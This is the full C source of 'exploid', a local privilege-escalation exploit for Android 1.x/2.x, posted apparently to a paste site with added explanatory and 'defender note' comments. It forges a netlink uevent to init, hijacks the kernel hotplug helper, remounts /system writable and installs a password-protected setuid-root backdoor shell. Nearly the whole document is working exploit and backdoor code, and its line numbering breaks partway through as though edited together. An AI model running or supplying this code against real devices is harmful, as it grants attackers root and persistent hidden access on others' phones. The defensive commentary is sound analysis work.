0xroot

Exploid for Android

Mar 14th, 2011
  1. /* android 1.x/2.x the real youdev feat. init local root exploit.
  2.  * (C) 2009/2010 by The Android Exploid Crew.
  3.  *
  4.  * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run.
  5.  * Or use /data/local/tmp if available (thx to ioerror!). It is important
  6.  * to use the /sqlite_stmt_journals directory if available.
  7.  * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc}
  8.  * or use USB keys etc. This will invoke hotplug which is actually
  9.  * our exploit making /system/bin/rootshell.
  10.  * This exploit requires /etc/firmware directory, e.g. it will
  11.  * run on real devices and not inside the emulator.
  12.  * I'd like to have this exploited by using the same blockdevice trick
  13.  * as in udev, but internal structures only allow world writable char
  14.  * devices, not block devices, so I used the firmware subsystem.
  15.  *
  16.  * !!!This is PoC code for educational purposes only!!!
  17.  * If you run it, it might crash your device and make it unusable!
  18.  * So you use it at your own risk!
  19.  *
  20.  * Thx to all the TAEC supporters.
  21.  */
  22. #include <stdio.h>
  23. #include <sys/socket.h>
  24. #include <sys/types.h>
  25. #include <linux/netlink.h>
  26. #include <fcntl.h>
  27. #include <errno.h>
  28. #include <stdlib.h>
  29. #include <string.h>
  30. #include <string.h>
  31. #include <unistd.h>
  32. #include <sys/stat.h>
  33. #include <signal.h>
  34. #include <sys/mount.h>
  35.  
  36.  
  37. // CHANGE!
  38. #define SECRET "secret"
  39.  
  40.  
/* Report a fatal error and terminate.
 *
 * msg is printed via perror(), i.e. as "<msg>: <strerror(errno)>" on stderr.
 * The process then exits with the current errno as its status; note that
 * this is 0 when the caller's failure did not set errno (e.g. a failed
 * comparison), so the exit status is not a reliable failure indicator.
 * Never returns. */
void die(const char *msg)
{
    perror(msg);        /* describe the failure on stderr */
    exit(errno);        /* status mirrors whatever errno currently holds */
}
  46.  
  47.  
/* Copy the regular file `from` to `to`.
 *
 * `to` is created (mode 0600) or truncated. Data is moved in 4 KiB chunks;
 * a read error, an open failure or a short write aborts the process through
 * die(), so on return the copy is complete. Both descriptors are closed and
 * sync() is called twice before returning. close() results are not checked. */
void copy(const char *from, const char *to)
{
    char chunk[0x1000];

    int in = open(from, O_RDONLY);
    if (in < 0)
        die("[-] open");
    int out = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600);
    if (out < 0)
        die("[-] open");

    ssize_t got;
    /* read() returns 0 at EOF, which ends the loop; -1 is a fatal error. */
    while ((got = read(in, chunk, sizeof(chunk))) != 0) {
        if (got < 0)
            die("[-] read");
        /* A partial write is treated as a failure rather than retried. */
        if (write(out, chunk, got) != got)
            die("[-] write");
    }

    close(in);
    close(out);
    sync(); sync();
}
  72.  
  73.  
/* Truncate /proc/sys/kernel/hotplug (the user-mode helper path) so the kernel
 * stops executing this binary on subsequent uevents. Only reached from the
 * euid-0 branch of main(). Neither open() nor write() nor close() is checked:
 * if open() fails, write() is issued on fd -1 and the error is ignored.
 * Defender note: an emptied kernel.hotplug sysctl is one of the observable
 * side effects of this tool running. */
void clear_hotplug()
{
    int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);
    write(ofd, "", 1);   /* writes a single NUL byte */
    close(ofd);
}
  80.  
  81.  
/* Backdoor entry, reached from main() when the process has euid 0 but a
 * non-root real uid, i.e. when the installed setuid copy is executed.
 * Requires fd 0 to be a /dev/pts/ terminal, reads a password from it,
 * compares it with SECRET and on success execs /system/bin/sh as uid/gid 0
 * with the caller's environment `env`. Every failure path ends in die(); the
 * function never returns.
 * Defender note: the root-owned 04711 /system/bin/rootshell that main()
 * installs is the persistent artifact to look for. */
void rootshell(char **env)
{
    char pwd[128];
    char *sh[] = {"/system/bin/sh", 0};

    /* readlink() does not NUL-terminate; zeroing first keeps pwd a string as
     * long as the link is shorter than 128 bytes. Return value unchecked. */
    memset(pwd, 0, sizeof(pwd));
    readlink("/proc/self/fd/0", pwd, sizeof(pwd));
    if (strncmp(pwd, "/dev/pts/", 9) != 0)
        die("[-] memory tricks");

    /* 18 == strlen("Password (echoed):"); input is not echo-suppressed. */
    write(1, "Password (echoed):", 18);
    /* Re-zero, then read at most 127 bytes so strlen() below stays bounded.
     * read()'s result is not checked. */
    memset(pwd, 0, sizeof(pwd));
    read(0, pwd, sizeof(pwd) - 1);
    sleep(2);

    if (strlen(pwd) < 6)
        die("[-] password too short");
    /* Prefix comparison only: bytes after strlen(SECRET), such as the
     * trailing newline, are ignored. */
    if (memcmp(pwd, SECRET, strlen(SECRET)) != 0)
        die("[-] wrong password");

    /* setuid()/setgid() results are not checked; execve() returns only on
     * failure, which die() turns into a termination. */
    setuid(0); setgid(0);
    execve(*sh, sh, env);
    die("[-] execve");
}
  106.  
  107.  
/* Entry point. Behaviour depends on the credentials the process starts with:
 *  1. euid 0, uid != 0 -> the installed setuid copy: hand off to rootshell().
 *  2. euid 0, uid 0    -> run as the kernel's hotplug helper (see file
 *                         header): clear the helper path, remount /system
 *                         read-write, install this binary as
 *                         /system/bin/rootshell (04711) and spin forever.
 *  3. otherwise        -> the unprivileged stage: stage files in a writable
 *                         directory and send a forged "add" uevent to pid 1
 *                         over NETLINK_KOBJECT_UEVENT.
 * The technique relies on the uevent listener in pid 1 acting on a message
 * from an unprivileged user-space sender. The corresponding hardening is to
 * verify the sender on that socket (kernel-originated netlink messages carry
 * nl_pid 0 / SCM_CREDENTIALS); a user process sending on
 * NETLINK_KOBJECT_UEVENT is itself worth detecting. `env` is forwarded to
 * rootshell() unchanged (the rtld remark below refers to that). */
int main(int argc, char **argv, char **env)
{
    /* Neither buffer is initialised; see the readlink() and iov notes. */
    char buf[512], path[512];
    int ofd;
    struct sockaddr_nl snl;
    /* iov spans all 512 bytes of buf, not just the formatted message, so
     * sendmsg() below transmits whatever follows the final NUL as well. */
    struct iovec iov = {buf, sizeof(buf)};
    /* Positional msghdr init: name, namelen, iov, iovlen, control,
     * controllen, flags. */
    struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
    int sock;
    char *basedir = NULL;


    /* I hope there is no LD_ bug in androids rtld :) */
    /* Case 1: running as the setuid copy. rootshell() never returns. */
    if (geteuid() == 0 && getuid() != 0)
        rootshell(env);

    /* readlink() does not NUL-terminate and path is uninitialised, so the
     * strlen(path) and "%s" uses below depend on a stray NUL in the
     * remaining stack bytes — a latent over-read. */
    if (readlink("/proc/self/exe", path, sizeof(path)) < 0)
        die("[-] readlink");

    /* Case 2: invoked by the kernel as the hotplug helper. */
    if (geteuid() == 0) {
        clear_hotplug();
        /* remount /system rw */
        /* yaffs2 first, then yaffs; the second mount() is unchecked. */
        if (mount("/dev/mtdblock0", "/system", "yaffs2", MS_REMOUNT, 0) < 0)
            mount("/dev/mtdblock0", "/system", "yaffs", MS_REMOUNT, 0);
        /* Persist: setuid-root, world-executable, not world-readable.
         * chmod() result unchecked. A new setuid binary in /system/bin and
         * /system mounted rw are the observable indicators. */
        copy(path, "/system/bin/rootshell");
        chmod("/system/bin/rootshell", 04711);
        /* Never exits; the helper process busy-spins from here on. */
        for (;;);
    }

    /* Case 3: unprivileged stage. */
    printf("[*] Android local root exploid (C) The Android Exploid Crew\n");

    /* Pick a writable staging directory (see file header), falling back to
     * the cwd. getcwd() may return NULL, in which case strdup(NULL) is
     * undefined behaviour. */
    basedir = "/sqlite_stmt_journals";
    if (chdir(basedir) < 0) {
        basedir = "/data/local/tmp";
        if (chdir(basedir) < 0)
            basedir = strdup(getcwd(buf, sizeof(buf)));
    }
    printf("[+] Using basedir=%s, path=%s\n", basedir, path);
    printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");

    /* Unicast destination: nl_pid 1, i.e. the uevent listener in init. */
    memset(&snl, 0, sizeof(snl));
    snl.nl_pid = 1;
    snl.nl_family = AF_NETLINK;

    if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)
        die("[-] socket");

    /* Staged files in basedir: "loading", "hotplug" (holding this binary's
     * path) and "data" -> /proc/sys/kernel/hotplug. Presumably, when the
     * forged firmware request is serviced, the "firmware" (our path) is
     * written through the "data" symlink into the hotplug sysctl — compare
     * the file header. creat()/close()/symlink() results are not all
     * checked. */
    close(creat("loading", 0666));
    if ((ofd = creat("hotplug", 0644)) < 0)
        die("[-] creat");
    if (write(ofd, path , strlen(path)) < 0)
        die("[-] write");
    close(ofd);
    symlink("/proc/sys/kernel/hotplug", "data");
    /* Forged uevent: NUL-separated KEY=VALUE fields in the kernel's format.
     * DEVPATH and FIRMWARE use ".." components so the paths resolve into
     * basedir. snprintf() truncation is not checked. */
    snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
             "SUBSYSTEM=firmware%c"
             "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);
    printf("[+] sending add message ...\n");
    /* Sends the full 512-byte iov (see above), not just the message. */
    if (sendmsg(sock, &msg, 0) < 0)
        die("[-] sendmsg");
    close(sock);
    printf("[*] Try to invoke hotplug now, clicking at the wireless\n"
           "[*] settings, plugin USB key etc.\n"
           "[*] You succeeded if you find /system/bin/rootshell.\n"
           "[*] GUI might hang/restart meanwhile so be patient.\n");
    sleep(3);
    return 0;
}